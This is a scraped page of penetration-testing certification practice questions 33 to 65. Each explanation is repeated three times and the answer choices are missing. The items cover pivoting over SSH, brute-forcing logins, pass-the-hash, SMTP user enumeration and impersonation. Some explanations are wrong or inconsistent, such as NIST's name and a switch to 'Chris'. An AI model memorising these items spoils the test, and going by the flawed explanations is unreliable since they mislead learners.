Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them
Unattempted
Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them
Question 33 of 65
33. Question
Sami wants to pivot from a Linux host to other hosts in the network but is unable to install additional tools beyond those found on a typical Linux server. How can he leverage the system he is on to allow vulnerability scans of those remote hosts if they are firewalled against inbound connections and protected from direct access from his penetration testing workstation?
Correct
Sami can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.
Incorrect
Sami can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.
Unattempted
Sami can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.
Question 34 of 65
34. Question
You and a colleague within the organization are discussing an open source research source that is maintained by the U.S. government’s National Institute of Science and Technology (NIST). This source provides a summary of current security. What is this government repository called?
Correct
The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics
Incorrect
The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics
Unattempted
The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics
Question 35 of 65
35. Question
While conducting an on-site penetration test, Dima plugs her laptop into an accessible network jack. When she attempts to connect, however, she does not receive an IP address and gets no network connectivity. She knows that the port was working previously. What technology has her target most likely deployed?
Correct
The organization that Dima is testing has likely deployed network access control, or NAC. Her system will not have the proper NAC client installed, and she will be unable to access that network jack without authenticating and having her system approved by the NAC system.
Incorrect
The organization that Dima is testing has likely deployed network access control, or NAC. Her system will not have the proper NAC client installed, and she will be unable to access that network jack without authenticating and having her system approved by the NAC system.
Unattempted
The organization that Dima is testing has likely deployed network access control, or NAC. Her system will not have the proper NAC client installed, and she will be unable to access that network jack without authenticating and having her system approved by the NAC system.
Question 36 of 65
36. Question
You are a senior penetration tester, and you are conducting a black box penetration test for a large organization. You want to probe the client’s web server IP address. You want to see what information may be associated with it, such as what cipher suite it uses. What tool should you use to complete this task?
Correct
Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.
Incorrect
Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.
Unattempted
Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.
Question 37 of 65
37. Question
You are a senior penetration tester, and you have just completed a simple compliance scan of your client’s network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that you were given prior to testing. What is most likely the cause for the discrepancy? (Choose two.)
Correct
Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.
Incorrect
Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.
Unattempted
Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.
Question 38 of 65
38. Question
Sami wants to use a brute-force attack against the SSH service provided by one of his targets. Which of the following tools is not designed to brute-force services like this?
Correct
Patator, Hydra, and Medusa are all useful brute-forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!
Incorrect
Patator, Hydra, and Medusa are all useful brute-forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!
Unattempted
Patator, Hydra, and Medusa are all useful brute-forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!
Question 39 of 65
39. Question
While performing a penetration test, the client organization’s network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?
Correct
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker
Incorrect
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker
Unattempted
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker
Question 40 of 65
40. Question
You are working as a penetration tester, and you are conducting a test for a new client. You have captured NTLM hashes and want to conduct a pass-the-hash attack. Unfortunately, you don’t know which systems on the network might accept the hash. What tool should you use to conduct the test?
Correct
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
Incorrect
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
Unattempted
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
Question 41 of 65
41. Question
Sami has been hired to conduct a penetration test of an organization that processes credit cards. His work will follow the recommendations of the PCI DSS. What type of assessment is Sami conducting?
Correct
The PCI DSS standard is an industry standard for compliance for credit card processing organizations. Thus, Sami is conducting a compliance-based assessment.
Incorrect
The PCI DSS standard is an industry standard for compliance for credit card processing organizations. Thus, Sami is conducting a compliance-based assessment.
Unattempted
The PCI DSS standard is an industry standard for compliance for credit card processing organizations. Thus, Sami is conducting a compliance-based assessment.
Question 42 of 65
42. Question
Sami is running a penetration test in a web application and discovers a flaw that allows him to shut down the web server remotely. What goal of penetration testing has Sami most directly achieved?
Correct
Sami’s attack achieved the goal of denial by shutting down the web server and preventing legitimate users from accessing it.
Incorrect
Sami’s attack achieved the goal of denial by shutting down the web server and preventing legitimate users from accessing it.
Unattempted
Sami’s attack achieved the goal of denial by shutting down the web server and preventing legitimate users from accessing it.
Question 43 of 65
43. Question
Your company is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?
Correct
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.
Incorrect
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.
Unattempted
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.
Question 44 of 65
44. Question
Your company is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?
Correct
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.
Incorrect
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.
Unattempted
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.
Question 45 of 65
45. Question
Which of the following options is why a JTAG access particularly useful for penetration testers who have physical access to systems?
Correct
JTAG debugging ports can provide greater visibility into tightly integrated hardware and software solutions, including the ability to access memory directly. This can provide access to encryption keys, passwords, or other capabilities that would otherwise be difficult for penetration testers to access. JTAG access is at a firmware level, rather than as a logged-in user, and does not provide remote access or logging.
Incorrect
JTAG debugging ports can provide greater visibility into tightly integrated hardware and software solutions, including the ability to access memory directly. This can provide access to encryption keys, passwords, or other capabilities that would otherwise be difficult for penetration testers to access. JTAG access is at a firmware level, rather than as a logged-in user, and does not provide remote access or logging.
Unattempted
JTAG debugging ports can provide greater visibility into tightly integrated hardware and software solutions, including the ability to access memory directly. This can provide access to encryption keys, passwords, or other capabilities that would otherwise be difficult for penetration testers to access. JTAG access is at a firmware level, rather than as a logged-in user, and does not provide remote access or logging.
Question 46 of 65
46. Question
You are a senior penetration tester, and you are conducting a penetration test for a new client. After performing a recent test, you discover that the client’s staff is using dictionary and seasonal passwords. What is the best way to control the use of common dictionary words from being used as passwords?
Correct
In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@ [\]^_’{|}~. This will make it harder for attackers to break into your client’s system.
Incorrect
In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@ [\]^_’{|}~. This will make it harder for attackers to break into your client’s system.
Unattempted
In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@ [\]^_’{|}~. This will make it harder for attackers to break into your client’s system.
Question 47 of 65
47. Question
Dima recovered a PNG image during the early intelligence-gathering phase of a penetration test and wants to examine it for useful metadata. What tool could she most successfully use to do this?
Correct
Exiftool is designed to pull metadata from images and other files. Grep may be useful to search for specific text in a file, but won’t pull the range of possible metadata from the file. PsTools is a Windows Sysinternals package that includes a variety of process-oriented tools. Nginx is a web server, load balancer, and multipurpose application services stack.
Incorrect
Exiftool is designed to pull metadata from images and other files. Grep may be useful to search for specific text in a file, but won’t pull the range of possible metadata from the file. PsTools is a Windows Sysinternals package that includes a variety of process-oriented tools. Nginx is a web server, load balancer, and multipurpose application services stack.
Unattempted
Exiftool is designed to pull metadata from images and other files. Grep may be useful to search for specific text in a file, but won’t pull the range of possible metadata from the file. PsTools is a Windows Sysinternals package that includes a variety of process-oriented tools. Nginx is a web server, load balancer, and multipurpose application services stack.
Question 48 of 65
48. Question
Which of the following options is a recon-ng command that can be used to identify available modules for intelligence collection?
Correct
The command show modules will list all available modules for use in recon-ng. Other options are incorrect because the command show workspaces will output a list of all workspaces that have been added to the recon-ng database. Use modules is incorrect because the command use modules will return an error since there is no module named “modules.” Set modiles is incorrect because set modules will display usage guidelines for the “set” command, along with a list of module options that may be configured.
Incorrect
The command show modules will list all available modules for use in recon-ng. Other options are incorrect because the command show workspaces will output a list of all workspaces that have been added to the recon-ng database. Use modules is incorrect because the command use modules will return an error since there is no module named “modules.” Set modiles is incorrect because set modules will display usage guidelines for the “set” command, along with a list of module options that may be configured.
Unattempted
The command show modules will list all available modules for use in recon-ng. Other options are incorrect because the command show workspaces will output a list of all workspaces that have been added to the recon-ng database. Use modules is incorrect because the command use modules will return an error since there is no module named “modules.” Set modiles is incorrect because set modules will display usage guidelines for the “set” command, along with a list of module options that may be configured.
Question 49 of 65
49. Question
You are a senior penetration tester, and you are conducting a test for a new client. You have just about completed the testing, and you want to make sure that the post-engagement cleanup process has no issues. What should you do throughout the testing phase to make sure that the post-engagement goes effortlessly?
Correct
After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.
Incorrect
After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.
Unattempted
After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.
Question 50 of 65
50. Question
You are a senior penetration tester, and you have just completed testing for a new client. A detailed penetration report was given to the security analyst. The penetration was conducted against the client’s DMZ environment. The report had a finding that the Common Vulnerability Scoring System (CVSS) had a base score of 1.0. To exploit this vulnerability, which level of difficulty would be required?
Correct
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.
Incorrect
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.
Unattempted
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.
Question 51 of 65
51. Question
Sami is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting a black box test. When would it be appropriate to conduct an internal scan of the network?
Correct
Because this is a black box scan, Sami should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.
Incorrect
Because this is a black box scan, Sami should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.
Unattempted
Because this is a black box scan, Sami should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.
Question 52 of 65
52. Question
You and a colleague are discussing rainbow table attacks versus brute-force attacks. Which of the following characteristics distinguish rainbow table attacks from brute-force attacks? Select two options.
Correct
Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offlineonly attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.
Incorrect
Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offlineonly attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.
Unattempted
Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offlineonly attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.
Question 53 of 65
53. Question
Sami is conducting a penetration test of an organization and is reviewing the source code of an application for vulnerabilities. What type of code testing is Sami conducting?
Correct
Sami is conducting static code analysis by reviewing the source code. Dynamic code analysis requires running the program, and both mutation testing and fuzzing are types of dynamic analysis.
Incorrect
Sami is conducting static code analysis by reviewing the source code. Dynamic code analysis requires running the program, and both mutation testing and fuzzing are types of dynamic analysis.
Unattempted
Sami is conducting static code analysis by reviewing the source code. Dynamic code analysis requires running the program, and both mutation testing and fuzzing are types of dynamic analysis.
Question 54 of 65
54. Question
While footprinting an organization for a penetration test, you discover that a service it relies on uses FTP across port 14147 for data transfers. How could you refine a Shodan search to only reveal FTP servers on that port?
Correct
Search and filter terms in Shodan must be provided in the format search_string filter:value. In the example given, FTP port:14147 will search for FTP connections available on the open Internet and then filter all but those running on port 14147 from the search results. Other options are incorrect because search and filter terms in Shodan must be provided in the format search_string filter:value.
Incorrect
Search and filter terms in Shodan must be provided in the format search_string filter:value. In the example given, FTP port:14147 will search for FTP connections available on the open Internet and then filter all but those running on port 14147 from the search results. Other options are incorrect because search and filter terms in Shodan must be provided in the format search_string filter:value.
Unattempted
Search and filter terms in Shodan must be provided in the format search_string filter:value. In the example given, FTP port:14147 will search for FTP connections available on the open Internet and then filter all but those running on port 14147 from the search results. Other options are incorrect because search and filter terms in Shodan must be provided in the format search_string filter:value.
Question 55 of 65
55. Question
While performing a black box penetration test for a large financial organization. Using reconnaissance techniques, you have identified the vendor that services the vending machines within the organization’s main headquarters. You dress in a similar uniform as the vendor’s employees. You also purchase a hand truck and several cases of soda pop. The receptionist of the target organization allows you to enter and directs you to the break room. What kind of exploit did you use in this scenario?
Correct
Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.
Incorrect
Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.
Unattempted
Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.
Question 56 of 65
56. Question
Dima is reviewing the results of a penetration test and learns that her organization uses the same local administrator password on all systems. Which one of the following tools can help her resolve this issue?
Correct
The Local Administrator Password Solution (LAPS) from Microsoft provides a method for randomizing local administrator account credentials through integration with Active Directory
Incorrect
The Local Administrator Password Solution (LAPS) from Microsoft provides a method for randomizing local administrator account credentials through integration with Active Directory
Unattempted
The Local Administrator Password Solution (LAPS) from Microsoft provides a method for randomizing local administrator account credentials through integration with Active Directory
Question 57 of 65
57. Question
You are an expert penetration tester, and you have just completed testing for a new client. You are conducting a post- engagement cleanup. What activities are performed during the post-engagement cleanup phase? Select three options.
Correct
CompTIA highlights three important post-engagement cleanup activities: ? Removing any shells installed on systems during the penetration test ? Removing any tester-created accounts, credentials, or backdoors that were installed during testing ? Removing any tools that were installed during testing Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.
Incorrect
CompTIA highlights three important post-engagement cleanup activities: ? Removing any shells installed on systems during the penetration test ? Removing any tester-created accounts, credentials, or backdoors that were installed during testing ? Removing any tools that were installed during testing Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.
Unattempted
CompTIA highlights three important post-engagement cleanup activities: ? Removing any shells installed on systems during the penetration test ? Removing any tester-created accounts, credentials, or backdoors that were installed during testing ? Removing any tools that were installed during testing Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.
Question 58 of 65
58. Question
While conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?
Correct
The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
Incorrect
The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
Unattempted
The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
Question 59 of 65
59. Question
Dima has acquired a list of valid user accounts but does not have passwords for them. If she has not found any vulnerabilities but believes that the organization she is targeting has poor password practices, what type of attack can she use to try to gain access to a target system where those usernames are likely valid?
Correct
Dima may want to try a brute-force dictionary attack to test for weak passwords. She should build a custom dictionary for her target organization, and she may want to do some social engineering work or social media assessment up front to help her identify any common password selection behaviors that members of the organization tend to display.
Incorrect
Dima may want to try a brute-force dictionary attack to test for weak passwords. She should build a custom dictionary for her target organization, and she may want to do some social engineering work or social media assessment up front to help her identify any common password selection behaviors that members of the organization tend to display.
Unattempted
Dima may want to try a brute-force dictionary attack to test for weak passwords. She should build a custom dictionary for her target organization, and she may want to do some social engineering work or social media assessment up front to help her identify any common password selection behaviors that members of the organization tend to display.
Question 60 of 65
60. Question
Which free and GNU-licensed tool written for the Windows operating system family gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names?
Correct
FOCA is a free, GNU-licensed tool that gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names. Note that while FOCA can be run in Linux and Unix variants using WINE (a compatibility layer or interface that allows Windows applications to run on *nix operating systems), the question specifically mentions that the tool was written for Windows, rather than stating that it only runs in Windows. Other options are incorrect. Because while Maltego and recon-ng are capable of scraping metadata from files with the use of transforms or modules, neither of these tools was written specifically for the Windows operating system family. Theharvester is incorrect because theharvester is limited to what can be pulled directly from a website; scraping the contents of files stored on a website is beyond its capabilities. In addition, theharvester is like Maltego and recon-ng in that it was not written specifically for the Windows operating system.
Incorrect
FOCA is a free, GNU-licensed tool that gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names. Note that while FOCA can be run in Linux and Unix variants using WINE (a compatibility layer or interface that allows Windows applications to run on *nix operating systems), the question specifically mentions that the tool was written for Windows, rather than stating that it only runs in Windows. Other options are incorrect. Because while Maltego and recon-ng are capable of scraping metadata from files with the use of transforms or modules, neither of these tools was written specifically for the Windows operating system family. Theharvester is incorrect because theharvester is limited to what can be pulled directly from a website; scraping the contents of files stored on a website is beyond its capabilities. In addition, theharvester is like Maltego and recon-ng in that it was not written specifically for the Windows operating system.
Unattempted
FOCA is a free, GNU-licensed tool that gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names. Note that while FOCA can be run in Linux and Unix variants using WINE (a compatibility layer or interface that allows Windows applications to run on *nix operating systems), the question specifically mentions that the tool was written for Windows, rather than stating that it only runs in Windows. Other options are incorrect. Because while Maltego and recon-ng are capable of scraping metadata from files with the use of transforms or modules, neither of these tools was written specifically for the Windows operating system family. Theharvester is incorrect because theharvester is limited to what can be pulled directly from a website; scraping the contents of files stored on a website is beyond its capabilities. In addition, theharvester is like Maltego and recon-ng in that it was not written specifically for the Windows operating system.
Question 61 of 65
61. Question
Sami runs an Nmap scan of the 10.10.0.0/16 network that his employer uses as an internal network range for the entire organization. If he uses the -T0 flag, what issue is he likely to encounter?
Correct
The -T flag in Nmap is used to set scan timing. Timing settings range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.
Incorrect
The -T flag in Nmap is used to set scan timing. Timing settings range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.
Unattempted
The -T flag in Nmap is used to set scan timing. Timing settings range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.
Question 62 of 65
62. Question
Dima wants to enumerate possible user accounts and has discovered an accessible SMTP server. What STMP commands are most useful for this?
Correct
VRFY verifies that an address exists, while EXPN asks for the membership of a mailing list. Both may be used to validate user IDs.
Incorrect
VRFY verifies that an address exists, while EXPN asks for the membership of a mailing list. Both may be used to validate user IDs.
Unattempted
VRFY verifies that an address exists, while EXPN asks for the membership of a mailing list. Both may be used to validate user IDs.
Question 63 of 65
63. Question
Which of the following options is a data source that is not a valid option in theharvester?
Correct
Although theharvester can query many data sources, Facebook is not one of them, which makes C the correct answer. Pay careful attention to questions that are stated with a negating term such as “is not” or “are not.” Other options are incorrect. Google, LinkedIn, and Twitter are all valid data sources for theharvester, making these incorrect choices for this question.
Incorrect
Although theharvester can query many data sources, Facebook is not one of them, which makes C the correct answer. Pay careful attention to questions that are stated with a negating term such as “is not” or “are not.” Other options are incorrect. Google, LinkedIn, and Twitter are all valid data sources for theharvester, making these incorrect choices for this question.
Unattempted
Although theharvester can query many data sources, Facebook is not one of them, which makes C the correct answer. Pay careful attention to questions that are stated with a negating term such as “is not” or “are not.” Other options are incorrect. Google, LinkedIn, and Twitter are all valid data sources for theharvester, making these incorrect choices for this question.
Question 64 of 65
64. Question
An expert consultant has been hired to perform a penetration test for an organization in the healthcare industry. The target of the test is a public-facing self-service website that users can access to view their health records. The penetration tester has been given full knowledge of the organization’s underlying network. What type of test is being conducted in this example?
Correct
A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goalsbased or objective-based assessments are usually designed to assess the overall security of an organization.
Incorrect
A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goalsbased or objective-based assessments are usually designed to assess the overall security of an organization.
Unattempted
A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goalsbased or objective-based assessments are usually designed to assess the overall security of an organization.
Question 65 of 65
65. Question
Which of the following options is a type of organization that is the most likely to face a regulatory requirement to conduct vulnerability scans?
Correct
The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors’ offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions
Incorrect
The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors’ offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions
Unattempted
The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors’ offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions
X
Use Page numbers below to navigate to other practice tests